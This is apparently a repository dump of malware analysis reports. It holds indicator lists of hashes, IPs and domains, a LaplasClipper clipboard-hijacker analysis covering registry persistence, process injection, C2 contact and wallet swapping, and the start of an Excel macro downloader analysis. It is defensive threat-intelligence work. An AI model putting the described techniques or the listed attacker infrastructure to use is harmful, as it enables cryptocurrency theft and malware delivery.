766524a72025be11ab13f0d5fe4dfefc295e3d43776aea18bdd1f48406eb7e95 103 | dad0603f527e69265ceddd96b09ff61a98841698d35b79ab72e5314ed1b1d2fa 104 | 15f2d230db5e36766301585f9db25513f00150e6ef6068505ab3415af17b3b0b 105 | 08bac2df27e5bc147a3fbc1eec996d1a9202dfe66cdd7cada83a21ae7ac45bbc 106 | 7e675bed2dcde312da5e4304573eebda886e61e542f5b40840bd37d5e90cafe5 107 | 8bb0378626735cca62f8512257a07c429847109d26d5383cd7eb4915ac13ea4e 108 | 5c31ec6dd2c16e34ac9c533b1e58e047e7da0e426909f41fb66a55372e3155e2 109 | b1b671842ea0b17a67e78741ceb401ccee0907e55c7a365aa78bf17aebe8e356 110 | a29867a44dc382a736370078a8f8ad7ef1f2d1ee9da27d07e1204ea34f3cafb0 111 | 8acf479508cca8603513d380e418178f465e0fa867c0e7e51df8b22ac763c134 112 | 2bba06807ad9fd0bdc1957a15f32c93b18f9663182e87d0a72956cf26142b497 113 | a440ad6e3c6d444ce1566fb0f29b25314f7a503615c17a27acc6aab671d130ca 114 | 41e1a9d2e39315c76c908d4d40150e930898e6221bcd96187413beffc2572315 115 | fc8dedb234d17ae5d5e58eaf372988114b82bd1a9defe9934e8d7738e15a88ab 116 | b9148dfec92ec25753e9a70e51ef698bc44a66be852a84b6e5296f873cf0ea79 117 | fdea12592b9bb743e5320d9222be5e3d38ea78d0f346eababaec749d31185e7e 118 | 7b129fd22e90e55cbdddfd760c4e86df11e2998fbb3ea126bb98b72c18997bb3 119 | fa318879db358e490dc763417711d144a17bd5ad8061821a1e820521ebefac16 120 | 45e8352d78b438ccf83d36f8679b58110a7296d65619f92e1f06c5da5d349ff9 121 | d5c2e24b2a27a822fd7a2611be1ed64daa804eab1819546030141407e28e941b 122 | bc89bbfbb6a41a488a2ad9a1a55be9ba28b1ff3501a4d22072ead32b121836c9 123 | eebc2ceadb7e9541112a27a583603fd284208f1e2d23329c726efcfc02244609 124 | 5b39db4d27b6a3c5822a06632dedb65df333f7ab938433ed4761eaf88cebf4e8 125 | 3d4f0f70fc18a3b464a938ffb32fb693329993738991b2fa2e2f1a3faf84e7b8 126 | 8ba9d40ae5f7da84438fa7b46c2ba376afc0aacf4d806a0c9d2bf323d4da21d3 127 | 3caaa84ffcbd28e8f6a95a11a8101508c06ee47dd00a93b0d52960e351e4a97c 128 | 5139afa0b3dc677c0a4f3cfdf93f65ede82a9ea6502ac87785603d5583e8f15a 129 | c01d1ca58e3801fd34ad3ce6385454348ab04c58a7ac8522bb214960e6642d0f 130 | dc473948da9ebd0cd7647b5894d0b84796d42010a965d94765330550f715b28e 131 | 95e3a34bb2edf3cb9eeccd4e08af7218a4580f945969da5ae948a47bd7f3bac1 132 | d37adce208895b993397f3fe975bef95bdb4544837ea3017ed1f15ed7da9b1f8 133 | 86db6c461a0c42868398aa5dd8b95c1f2748cc05c444ba4840d6772ccedc1a33 134 | 8462fd9066d10c0507394c75d66c915e0bd04e4b7107dac752d7855abe3ee3da 135 | 98b28d84bb0b1479d10646a5d34d02f9e25718adc285634fb11d407188089e1d 136 | c4dd940d7d23aba5aa3c4b6b2f09701180631fcfe0e5756cf242b16514824daf 137 | 8ddee8d21d6847b663197cd64682cafc4a34bcc0a86af6a5e82f0bddfa838aee 138 | df1b0eef4f32a5c2527691175375962957db71bc913d37f6e71150e599b2b31c 139 | 62d4b809036b03226c7b5c36b6126d97cc1ecf915200146391bf05e74c58e874 140 | ddc510c3b697c0c9d361f7ef5d62cb101d134a81dd76a25a4c08031afb6e936a 141 | df45997fda4f29688fe71512f82e6b5cd826c917d3c269fd51c1fa32d4890ad4 142 | c8cab98913ed816e5302e5d6bdf36b565088b35c0235e017879acba43219015b 143 | 855a1eca9c5b0a87ae4bd3c993fa9582807db1f7620e63d558f310826f17f5bb 144 | bc56169e0d244106d996f013991bc22087310511ee4a5eb00605132970ece0aa 145 | af6e8234a2211a8b50c4e4de3f8a268b3ee98cb6bdc94959c4f1cc88ab8e3b66 146 | fd41933f53e4d9c08e9c7c17f22206bf6599dc9f912be87e2c09bb05a10013a5 147 | e0047eef676c9123a68230bf0c600b067aa0783a934205d26c63d997c4fae82b 148 | a9ccf164caf3f859b3233f50fd77ba7ca837317338d055841a414dcb60a757dd 149 | d24ea1fb5048a0cad103d4e728f7089562bc3397d7e6cc5a7933a12ed4b658f1 150 | 62c5952200a46bc706021d3102ef6d4e8e11b854750156a770643107a2538ca2 151 | 4aaa5e4ef84050dc285108aab6c668adb84d69ff1e2233bcb2d0149478a4bfeb 152 | 7a34ef3a5f0d2db6674d93de3143d2469d8fa06bf450dc4c1609c97822e68f53 153 | 2da5d0fab4e517de649c1116c62b23202b6d4b46a99f1aa05d44d345d280ca10 154 | 89cdf1763a4e844821117df0e03d1447ec951fa3d512e53356c1af5c1a96b2d0 155 | 7230d625e58f4378e6bbd34d4ed2d55a79f3ad941d21efd18ba16e5afc7b00e4 156 | b6fbd1e6813b72c6451666ad593bbf0eb259df260c3f3d2fcc962a5cb317c98b 157 | 18fffdf046406f3e77b5710a25907406275df9936a76b32977e0956b20d48612 158 | 01271534c6ea0137c8b7e38b66b13f34272d3196fd8e0926c2d24b3a7c4547fc 159 | db912789ffc493f082adea43b0213611eb8f30691ec2496cf2ce534f67473cda 160 | 1cb12659200d6324c3c3507407da00197b47e73fdbbac955b1b0ea13828345ee 161 | ea279885af5791b59110e398c288085ca4018a93233514d2baef1fc821540e3d 162 | 60fa13c5e86925ce4a8a7a957de158a478c5c16180f621e93da1adb12aba0195 163 | 85ce49f0532bcb23b394c9af68f6b816670d5deeba332c15aae2ed158a10f19e 164 | 3a3446d2795cada474dd50f01d0f71ac26898c4773a2fb87db675040a558a8dc 165 | a00b755ef03464d7999af3d3cdaaa1c446d98e616856264b76173450306c5e68 166 | 5321a383609006479672cc42334489cbb2dcc17eeb8af688350a1d4bce1df3d0 167 | 65f71681c11a1bf83be0a343dd03afc5927e20d40487fe746156f3aaeedfd5d4 168 | e2578171e1b9bcf0282b5246a8c6cb79829387a340ca70fecdc7c48c2f6ae24c 169 | fbcdf1532a2095924283e9d60f013d107036cdebce2772bfaf41b429931fdf58 170 | 45396624a6baf645800513cdbc6111703399e137c63c4498c0e9cfbc99b141f9 171 | 05d32cd3b93a055d165a689e3c561d6b32a291449ef4dbb2477d7b4153d7583e 172 | bdc4cafefa90b60f8a60053bd589de648061cb51ec80dd15785746d601b1a345 173 | 88839c72ad1124401faf0d4ba7c20799c0825fd14c45aed2b27f9eb068abafce 174 | a36ca6406a273cb0d73b0c76e66c559cd140c1941024b37f6e89a10ba4a0e3d8 175 | c234510a389c16b722b67ba7896e49c034a03d06bbe42a787f02522d25a9431d 176 | e22cc7329a3ee317a838f8420bddbee282bf9667ff74ffc2fa446468639f5349 177 | 33eff767b99def77e4d5ca2586a16b3e573b38b675d03dad841761093f067227 178 | 7b0d50834f7903e476e8dd9be42c3e68e9efe722a65fc90e77e5e0f025476535 179 | 19a9ec9da618f09710fd8e6e1daec72377e05e78bd7469f33e203a9529d712fd 180 | db10e161fe1e1e3c38b8865a487d134445fb0f07a5e8fe466f75948e2a605b5f 181 | f2ac93d21112c60a3f5a2e0b2f86ca1b9ae688680754140d031b15752e2df6ba 182 | 6ccee842a4957d3410ae6163bb96a9b7739b3ffc3032dfeeb2a3c7b273ca5656 183 | 401a430936fe880e531de6c2476df50ed9be9e5bc9c8ea5149657b16b4a1eb84 184 | 222ad93c9537bc72a00d01aaeab70acaea61210fb0de3967d671920848c87b04 185 | b4e446102081c3dda96a91145270f8a13ce318b708bea3921bc286e4c6fcc2a2 186 | b0b3a059f434681f3f6cee2e2fcea6e91894255d7b63b0116d897b3e83b69e1a 187 | 6b7f36519cdc4a69ebc2e6986331da18741bdb3eaf1f6dc4bd7e8acc3db77382 188 | 494cf04c6406ba864ce890869984fa9e779751b0ad76c0e55ab28ec898d088b9 189 | 544e3462ef5a4adb7d39c3022a17d13b9eb55db435e38c55bd02b5433ea546b8 190 | b8e464201936080cd2e6b7fe6e93a2b6a66622ab361fee8cf0dad92d1616b0d5 191 | 937e7a7aea799b2b5d57d66077d66567545fd2010149df9ff90e639ecad62386 192 | 3946f3036e103af4caf04607d09ead4968fc0240881596f5e95db307f260d898 193 | f0b819044a3bd7d24e2adfcf4fbed1f6ba6ca0a93fe29b6abf5f6dfe5279b8c7 194 | d640fe3968dbefc28ce7ae480b3e01578c6a1232087d7d17f96fbe35d89c19ae 195 | c7b09601e132a1d10735f89dbec1fa98c2271b102d9a07b8bb41858775172312 196 | 4024f6526ce45d32b49b46ee1b708a84ffb68b8204abb231d76f850161f5b38c 197 | fb410f778d6b9ee7fe146ddeef7601bb1428c737f01cdb6885aeafe6d25d5d18 198 | 298d3c150bbee5312da015cd6448e7dc47eddcda5a6ddd215072102b6ba9e9e3 199 | 0d6f7d870b27c6d1ad339d5d8f964913ca3830465ad33bc499b64c034991bc66 200 | Bcde5526481770c7e19f3077b14396497bc21e751c509e0f9d4374f424b5e69a 201 | bd7323675e66df34d833d17897c6f98e9848dd062be6f299f482c09a90de4255 202 | C0ee1071e444f415f8b62856a0896f3b22e563f1bb4f03d14142583efe49a565 203 | 204 | 205 | 142.93.110.250 206 | 45.151.250.142 207 | 198.185.159.144 208 | 185.53.178.7 209 | 162.159.138.85 210 | 216.218.185.162 211 | 138.199.37.226 212 | 13.248.216.40 213 | 107.175.212.60 214 | 103.145.254.203 215 | 180.214.236.4 216 | 37.0.11.227 217 | 180.214.238.224 218 | 198.12.84.30 219 | 103.167.92.57 220 | 198.12.89.141 221 | 103.171.1.178 222 | 103.156.91.153 223 | 192.210.240.32 224 | 104.168.33.25 225 | 192.210.240.37 226 | 107.174.138.146 227 | 23.95.52.206 228 | 107.175.3.53 229 | 212.193.30.214 230 | 107.172.73.137 231 | 107.173.191.123 232 | 179.43.175.179 233 | 198.46.136.246 234 | 235 | 236 | trieutin.com 237 | dj.ruppersalimentos.com.br 238 | prosperbusinessdepot.com 239 | vitrifrig0.com 240 | basbeigium.com 241 | tatlub.com 242 | rajparis.in 243 | www.heyconi.com 244 | www.executrainpr.com 245 | 246 | ``` 247 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 248 | 249 | 250 | -------------------------------------------------------------------------------- /LaplasClipper/LaplasClipper.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | LaplasClipper (Laplas Clipper also known as Laplace Clipper) is a well-known malware that operates as a crypto clipboard hijacker. It has been in use since 2022. This malware can be purchased from its portal for as low as $49, with payment structured as a monthly subscription. LaplasClipper has been employed by various criminal threat actors to steal cryptocurrencies. 4 | 5 | This malware gains access to devices through various methods. It has been observed being distributed through YouTube video links or compromised websites, as well as links to files containing LaplasClipper loaders. It has also been delivered via spear-phishing campaigns. In recent versions of the malware, it establishes persistence in registries and injects itself into files it creates to gain an advantageous position. From there, it monitors the clipboard, waiting for cryptocurrency wallet-related information to be added. It modifies this information to hijack the cryptocurrencies to the attacker's server. 6 | 7 | As I said, Laplas has been involved in several executions related to other malware or loaders, some of them, which are related to active groups, are the following: 8 | 9 | * VidarStealer 10 | * SmokeLoader 11 | * AresLoader 12 | * RedLine Stealer 13 | * AgentTesla 14 | 15 | # _Technical Analysis 16 | 17 | As mentioned earlier, LaplasClipper has various initial access vectors through which it can infiltrate affected devices. Its ultimate goal is to modify the clipboard to alter transactions related to cryptocurrencies. 18 | 19 | An illustrative example of its steps is as follows: 20 | 21 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/8b5d9b26-7636-4fed-944b-51c120b495a0) 22 | 23 | With this diagram, I aim to provide a general understanding of how new versions of LaplasClipper function. I've reviewed recent samples and found no significant variations between them. Therefore, the execution tree of current LaplasClipper versions should be similar to what I present below: 24 | 25 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/cb87f88f-a676-4f2d-9a23-151d062ab9bc) 26 | 27 | We can observe the execution of a binary that establishes persistence in \CurrentVersion\RUN. It also launches a file named "ntlhost," which is subsequently injected. Notably, the name of the dropped binary ("ntlhost") and the writing path vary, representing the most noticeable differences I've identified, an example of this are the following paths: 28 | 29 | ``` 30 | C:\Users\\AppData\Roaming\NTSystem\.exe 31 | C:\Users\\AppData\Roaming\telemetry\.exe 32 | ``` 33 | 34 | Regarding the persistence aspect, there isn't much mystery. The binary creates a file (which we will see shortly) in a temporary path. Depending on the version, it could be one or another path. It then modifies the registry key and adds the newly created path. This ensures that LaplasClipper executes with every login 35 | 36 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/8d9d4da4-9d12-4c7f-8fdd-577a5ea0475f) 37 | 38 | At this stage, we've discussed the creation of a file. It's intriguing that relatively recent samples I've encountered are quite heavy. This is a common tactic used by some malware to deter analysis. Such samples slow down orchestrated analysis systems, increase the time taken for software reversing, and so on. Essentially, these samples contain unnecessary functionalities that don't justify their weight. This becomes more problematic when the malware creates a second file in temporary paths. 39 | 40 | In terms of file writing, in the analyzed samples, multithreading is heavily employed. Threads are used to expedite the binary's writing process. This approach makes sense, given that the files launched in temporary paths are typically large. As I mentioned earlier, in this routine, we can observe how the binary gradually writes the file before releasing it, leaving the file in the path. 41 | 42 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/04fe9b1f-fa46-4203-aacb-51fe8cfa36d3) 43 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/8f747c20-8e5a-49f9-8373-eab53c2e5d25) 44 | 45 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/076e7728-589c-41a4-bf0f-bbd164426620) 46 | 47 | Following this, I started comparing the files. It seemed unusual and uncommon for malware to drop itself, so I anticipated that it would weigh much more. However, upon examining its functions, strings, and data content, I found that its functionalities were mostly the same, with the addition of a significant amount of data at the end. 48 | 49 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/7d26723c-c8c5-493f-935d-bece1f6a084f) 50 | 51 | The binary operates heavily in memory. Depending on the version, I encountered samples packed with MPRESS or ones with obfuscated sections that were gradually deobfuscated during runtime. Consequently, in addition to the functionalities Laplas already possesses (excluding packed versions), it imports numerous libraries. During runtime, it dynamically loads more libraries and imports using GetProcAddress + LoadLibrary. 52 | 53 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/491e9417-a8d5-4772-95b7-b8ecad72f348) 54 | 55 | Some of the loaded imports/functions include: 56 | 57 | ``` 58 | AbortSystemShutdownA 59 | AbortSystemShutdownW 60 | AccessCheckAndAuditAlarmA 61 | AccessCheckAndAuditAlarmW 62 | AccessCheckByTypeA 63 | AccessCheckByTypeAndAuditAlarmA 64 | AccessCheckByTypeAndAuditAlarmW 65 | AccessCheckByTypeResultListA 66 | AccessCheckByTypeResultListAndAuditAlarmA 67 | AccessCheckByTypeResultListAndAuditAlarmW 68 | AddAccessAllowedAce 69 | AddAccessAllowedAceEx 70 | AddAccessAllowedObjectAce 71 | AddAccessDeniedAce 72 | AddAccessDeniedAceEx 73 | AddAccessDeniedObjectAce 74 | AddAce 75 | AddAuditAccessAce 76 | AddAuditAccessAceEx 77 | AddAuditAccessObjectAce 78 | AddConditionalAce 79 | AddMandatoryAce 80 | AddUsersToEncryptedFile 81 | AddUsersToEncryptedFileEx 82 | AdjustTokenGroups 83 | AdjustTokenPrivileges 84 | AllocateAndInitializeSid 85 | AllocateLocallyUniqueId 86 | AreAllAccessesGranted 87 | AreAnyAccessesGranted 88 | AuditComputeEffectivePolicyBySid 89 | AuditComputeEffectivePolicyByToken 90 | AuditEnumerateCategoriesBySid 91 | AuditEnumerateCategoriesByToken 92 | AuditEnumeratePerUserPolicyBySid 93 | AuditEnumeratePerUserPolicyByToken 94 | AuditEnumerateSubCategoriesBySid 95 | AuditEnumerateSubCategoriesByToken 96 | AuditLookupCategoryGuidFromCategoryId 97 | AuditLookupCategoryIdFromCategoryGuid 98 | AuditLookupCategoryNameA 99 | AuditLookupCategoryNameW 100 | AuditLookupSubCategoryNameA 101 | AuditLookupSubCategoryNameW 102 | AuditQueryGlobalSaclA 103 | AuditQueryGlobalSaclW 104 | AuditQueryPerUserPolicyBySid 105 | AuditQueryPerUserPolicyByToken 106 | AuditSetGlobalSaclA 107 | AuditSetGlobalSaclW 108 | AuditSetPerUserPolicy 109 | AuditSetSecurity 110 | BackupEventLogA 111 | BackupEventLogW 112 | BuildExplicitAccessWithNameA 113 | BuildExplicitAccessWithNameW 114 | BuildImpersonateExplicitAccessWithNameA 115 | BuildImpersonateExplicitAccessWithNameW 116 | BuildImpersonateTrusteeA 117 | BuildImpersonateTrusteeW 118 | BuildSecurityDescriptorA 119 | BuildSecurityDescriptorW 120 | BuildTrusteeWithNameA 121 | BuildTrusteeWithNameW 122 | BuildTrusteeWithObjectsAndNameA 123 | BuildTrusteeWithObjectsAndNameW 124 | BuildTrusteeWithSidA 125 | BuildTrusteeWithSidW 126 | CancelOverlappedAccess 127 | ChangeServiceConfig2A 128 | ChangeServiceConfig2W 129 | ChangeServiceConfigA 130 | ChangeServiceConfigW 131 | CheckTokenMembership 132 | ClearEventLogA 133 | ClearEventLogW 134 | CloseCodeAuthzLevel 135 | CloseEncryptedFileRaw 136 | CloseEventLog 137 | CloseServiceHandle 138 | CloseThreadWaitChainSession 139 | CloseTrace 140 | CommandLineFromMsiDescriptor 141 | ComputeAccessTokenFromCodeAuthzLevel 142 | ControlServiceA 143 | ControlServiceExA 144 | ControlServiceExW 145 | ControlServiceW 146 | ControlTraceA 147 | ControlTraceW 148 | ConvertAccessToSecurityDescriptorA 149 | ConvertAccessToSecurityDescriptorW 150 | ConvertSecurityDescriptorToStringSecurityDescriptorA 151 | ConvertSecurityDescriptorToStringSecurityDescriptorW 152 | ConvertSidToStringSidA 153 | ConvertSidToStringSidW 154 | ConvertStringSecurityDescriptorToSecurityDescriptorA 155 | ConvertStringSecurityDescriptorToSecurityDescriptorW 156 | ConvertStringSidToSidA 157 | ConvertStringSidToSidW 158 | ConvertToAutoInheritPrivateObjectSecurity 159 | CopySid 160 | CreateCodeAuthzLevel 161 | CreatePrivateObjectSecurity 162 | CreatePrivateObjectSecurityEx 163 | CreatePrivateObjectSecurityWithMultipleInheritance 164 | CreateProcessAsUserA 165 | CreateProcessAsUserW 166 | CreateProcessWithLogonW 167 | CreateProcessWithTokenW 168 | CreateRestrictedToken 169 | CreateServiceA 170 | CreateServiceW 171 | CreateTraceInstanceId 172 | CreateWellKnownSid 173 | CredBackupCredentials 174 | CredDeleteA 175 | CredDeleteW 176 | CredEncryptAndMarshalBinaryBlob 177 | CredEnumerateA 178 | CredEnumerateW 179 | CredFindBestCredentialA 180 | CredFindBestCredentialW 181 | CredFree 182 | CredGetSessionTypes 183 | CredGetTargetInfoA 184 | CredGetTargetInfoW 185 | CredIsMarshaledCredentialA 186 | CredIsMarshaledCredentialW 187 | CredIsProtectedA 188 | CredIsProtectedW 189 | CredMarshalCredentialA 190 | CredMarshalCredentialW 191 | CredProfileLoaded 192 | CredProfileUnloaded 193 | CredProtectA 194 | CredProtectW 195 | CredReadA 196 | CredReadByTokenHandle 197 | CredReadDomainCredentialsA 198 | CredReadDomainCredentialsW 199 | CredReadW 200 | CredRenameA 201 | CredRenameW 202 | CredRestoreCredentials 203 | CredUnmarshalCredentialA 204 | CredUnmarshalCredentialW 205 | CredUnprotectA 206 | CredUnprotectW 207 | CredWriteA 208 | CredWriteDomainCredentialsA 209 | CredWriteDomainCredentialsW 210 | CredWriteW 211 | CredpConvertCredential 212 | CredpConvertOneCredentialSize 213 | CredpConvertTargetInfo 214 | CredpDecodeCredential 215 | CredpEncodeCredential 216 | CredpEncodeSecret 217 | CryptAcquireContextA 218 | CryptAcquireContextW 219 | CryptContextAddRef 220 | CryptCreateHash 221 | CryptDecrypt 222 | CryptDeriveKey 223 | CryptDestroyHash 224 | CryptDestroyKey 225 | CryptDuplicateHash 226 | CryptDuplicateKey 227 | CryptEncrypt 228 | CryptEnumProviderTypesA 229 | CryptEnumProviderTypesW 230 | CryptEnumProvidersA 231 | CryptEnumProvidersW 232 | CryptExportKey 233 | CryptGenKey 234 | CryptGen 235 | [...] 236 | ``` 237 | 238 | Talking about loaded libraries, I have seen in different samples that before performing this action, it tries, in the new path it has created where it launches the file, to load several libraries that it then loads normally, but first it tries to load it from the source path, which creates a big noise in telemetry that is quite accessible for detection. 239 | 240 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/b61103a8-0437-4e67-8d86-a0b7525da4ea) 241 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/a2f8a300-6542-4769-8ea9-8281a7300aa4) 242 | 243 | Summary of all tries: 244 | 245 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/c80d965c-1947-47d9-b4a4-e3ab7f0e9ebf) 246 | 247 | After this, in all versions of the malware, it somehow retrieves system information. While not its main focus, it collects elements such as the OS version, computer and user names, time, and device language. These elements are usually more for victim identification concerning the command and control (C&C) rather than data that a RAT or pure stealer might extract. Notably, the most interesting information I discovered was the OEM version being used on my machine. 248 | 249 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/99845245-f0b9-4c18-b4aa-358a0db99e34) 250 | 251 | Subsequently, with the new capabilities loaded into memory, the file written in a temporary path, persistence established, and basic victim machine information acquired, it proceeds with injection. Even in this stage, it doesn't perform any novel actions. It loads the file to inject into memory, opens the file written in the path (which, as we remember, was disproportionately large), and opens it in a suspended state to write to it. It then releases it using ResumeThread, at which point we'll see it running with the filename it dropped earlier 252 | 253 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/cd4b6c53-17fc-4efe-ad7c-cbe7ce7da68a) 254 | 255 | After this, we'll observe the malware delving into network functions. I've captured various types of traffic from different samples. Here, it's evident how it makes a request to an address commonly used by LaplasClipper: 256 | 257 | > Clipper[.]guru. 258 | 259 | Following this, it sends data to the attacker, including information about our machine and a generated identifier. 260 | 261 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/4cd1553b-b7eb-4e6e-9a1c-97579c60edfd) 262 | 263 | Here's what occurs in this phase, having ensured no information slipped through. The malware constantly monitors the clipboard. It uses regular expression (Regex) patterns to detect certain content, as shown below: 264 | 265 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/576214d9-cf13-45c3-891e-eb40bc56d160) 266 | 267 | Subsequently, with the established connection I mentioned earlier, along with the obtained information, it maintains control of the clipboard. It waits for the victim machine to perform cryptocurrency wallet-related actions. This means that the malware simply waits for one of those patterns to be written to the clipboard. When this happens, it changes the wallet address to one controlled by the attacker. For instance, if you were a LaplasClipper victim attempting a cryptocurrency transaction, the malware would automatically alter the transaction to the attacker's server. 268 | 269 | An example I recently came across on Twitter by Jane (follow her at @Jane_0sint) demonstrates this process clearly on Any.Run. 270 | 271 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/e8a7ecde-4b28-4491-b0ff-571433a89cc2) 272 | 273 | Following this, having accumulated a considerable number of IP addresses from different analyzed samples and having spent some time researching this malware across networks, I began searching for all these servers. 274 | 275 | The first step was to examine the domain it initially connected to, and I found that everything was associated with laplas.app. However, my attempts to access the portal proved unsuccessful, so I dug deeper to locate these servers. It turned out that they had all been moved temporarily. I recall seeing an image like this on Twitter, credited to the cyber colleague Chris Duggan (follow him at @TLP_R3D). 276 | 277 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/db5c7340-37fd-4ce9-9e9e-2e58db57f3dc) 278 | 279 | I attempted to check if the situation was the same now, and indeed, I found the same information: 280 | 281 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/dd70f1ac-4c4a-4bb3-a4a8-2c90b4986bd5) 282 | 283 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/25c9db67-e468-4603-9cfe-f79ae52bb047) 284 | 285 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/f1fe3388-3409-4a55-97f9-be1a1cb458df) 286 | 287 | 288 | I then tried to see if I could reach the servers that the analyzed samples were connecting to (telemetry indicated that everything was fine, but I like to verify everything). I could indeed see both the previously discussed Regex patterns and the requests. 289 | 290 | Following this, I began searching for the portal and found both Telegram groups associated with the creators and the web portal. The web portal had moved from Laplas but retained the exact same functionality. It only changed how it is accessed. Internally, it functions the same and sends information in a similar way. However, it's now controlled from a different hosting location: 291 | 292 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/9be55bad-bee6-4328-bbdd-9f8bd11261a2) 293 | 294 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/7fe8e695-3178-4f07-a8e6-36b0b0e58306) 295 | 296 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/36ceaf34-10c9-48a8-bc18-cc26383737a2) 297 | 298 | 299 | For better clarity, I've created the following map to consolidate the information: 300 | 301 | ![image](https://github.com/vc0RExor/Quick-Analysis/assets/91592110/963635c1-4cae-4bfa-8013-05c74a757033) 302 | 303 | LaplasClipper has seemed to me a very interesting malware, of which there is not much information, that is why I have ventured into it, I am sure that a large number of criminal groups will make use of it, as it works quite fast and is quite stealthy, we will keep track of this malware and the use they make of it, as well as if new versions appear to keep getting detection possibilities. 304 | 305 | Finally, I would like to thank you for reading this analysis and for supporting me :) 306 | 307 | # _TTP 308 | 309 | ``` 310 | [T1140] Deobfuscate/Decode Files or Information 311 | [T1027] Obfuscated Files or Information 312 | [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 313 | [T1129] Shared Modules (No estoy seguro, para las cargas de librerias en runtime) 314 | [T1095] Non-Application Layer Protocol 315 | [T1106] Native API 316 | [T1543] Create or Modify System Process 317 | [T1082] System Information Discovery 318 | [T1055] Process Injection 319 | [T1115] Clipboard Data 320 | ``` 321 | 322 | # _IOC 323 | 324 | ``` 325 | 78362eb5c4529001a3bc7ecab62b904afef81c63b6778ba00b99eb3398140dab 326 | 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c 327 | 4230177379ff0422741a5714ba02dbeccdac0edc6d2c1e4123827f23ff179e64 328 | bdf326424f960a66d01dd645db9fd335a157ceb86d7f482ff15205fa7d9cc7b0 329 | f022037056b50b4baf5db8ba0a437494662dc93cee9421ed12471e14a58a0d50 330 | 22b198c5fc1e073ef00fc7a44ca20db5f44630f4e0e746abcf2060207d7129d9 331 | d30e2337e87b5bad478d20dea2fa51d38a4a9506542bdaaea7640dcc68a4432c 332 | a3f665043305d67f64f7386a8bcd89dc5ce86a76a6b5042827af58cd8b4e10f2 333 | 17ca2de661fa07dd83a55a5005c61eb8aee1e9cab56e9a13bc36a27f4b785554 334 | 335 | clipper[.]guru 336 | 337 | 85[.]192[.]40[.]252 338 | 206[.]189[.]229[.]43 339 | 185[.]209[.]161[.]61 340 | 168[.]100[.]10[.]236 341 | 45[.]66[.]230[.]149 342 | ``` 343 | 344 | > :t-rex: [vc0=Rexor](https://github.com/vc0RExor) :detective: 345 | 346 | -------------------------------------------------------------------------------- /Macros/A macro downloader.md: -------------------------------------------------------------------------------- 1 | # _Overview 2 | 3 | _This malware, it's normally into a office file (Such docx or xls), the user downloads it across to a malicious mail that try to trick us to launch the download. After that, when we try to open this file, It try to execute the content, when it does, the macro will launch and you will see the malicious behavior._ 4 | 5 | # _How malware doc accesses 6 | 7 | As I've explained before, our Malware, comes through mail, the victim, recieves an attached file in a fake mail, when the user accepts the content, the office file (In our case is a .XLS) is downloaded, at this point, the malware writter have a malicious file at your disk, the next step is execution, to do it, the user needs to open the file in a MS Office (Or similar program). 8 | The victim, open the malicious file and will see a ***Fake Document Signed to protect the file*** that "needs" allow the content. By default, this option is locked because it's common to use macros to launch malware or use it as downloader. 9 | 10 | ![Alt text](https://user-images.githubusercontent.com/91592110/136939248-f1fcec91-b056-441e-9a14-75c29a752c93.png) 11 | 12 | ![image14](https://user-images.githubusercontent.com/91592110/136941194-6cc7bf21-41ed-415c-a462-3f32b0c357f1.png) 13 | 14 | Now, when enable the content, the macro will run in your computer, and the malicious behavior starts. 15 | 16 | # _Macro Anlysis & Extraction 17 | 18 | After macro launches, You will see the Process _Excel.exe_ executing a _Rundll32.exe_ , it's a good indicator, to see that a docu have a macro (As launching a shell). 19 | 20 | ![image2](https://user-images.githubusercontent.com/91592110/136939682-cb1d0548-ed65-4481-868d-1ec073eacb0e.png) 21 | 22 | Now will we analyze the macro contents to find interesting information, scanning the XLS document will find PE elements that indicates that into we have malicious content. 23 | 24 | ![image3](https://user-images.githubusercontent.com/91592110/136939736-1a2368e5-3547-4cf5-ab71-5faba80677f7.png) 25 | 26 | After a first overview, we persists using more tools and found an _"AutoExec"_ called as _WorkBook_ into XLS, a register that calls a DLL, and a VBA obfuscated, we can see the path _%APPDATA%\Roaming_ that is a path used normally by malware as _%TEMP%_ where later gains persistance using a regkey or for dropping more malware, we can see a string called _"Goka"_ it will be interesting in a few moments 27 | 28 | ![image4](https://user-images.githubusercontent.com/91592110/136939787-37a9f328-2094-4eb2-9d25-10f8aceab5b2.png) 29 | 30 | ![image5](https://user-images.githubusercontent.com/91592110/136939794-583e85fd-166f-4846-b97b-2791399dad97.png) 31 | 32 | How we have a _Workbook_ into the XLS, we can research into and extract all of them, and we will see contents as imports, URLs... 33 | 34 | ![image6](https://user-images.githubusercontent.com/91592110/136939924-1db8f681-de14-4bc6-863c-8c0ab109f672.png) 35 | 36 | ![image7](https://user-images.githubusercontent.com/91592110/136939940-cdc9c6ae-2191-466b-abb3-91c19cbd2508.png) 37 | 38 | Now we have good IOC, a domain _(hXXp://asengjewelry[.]com/)_ and indicators that the Macro will try to download a file (DownloadToFileA) and use it to gain persistence (DllRegisterServer) 39 | 40 | Looking for this domain, We find that it's detected by any engines in VirtusTotal, and the domain is 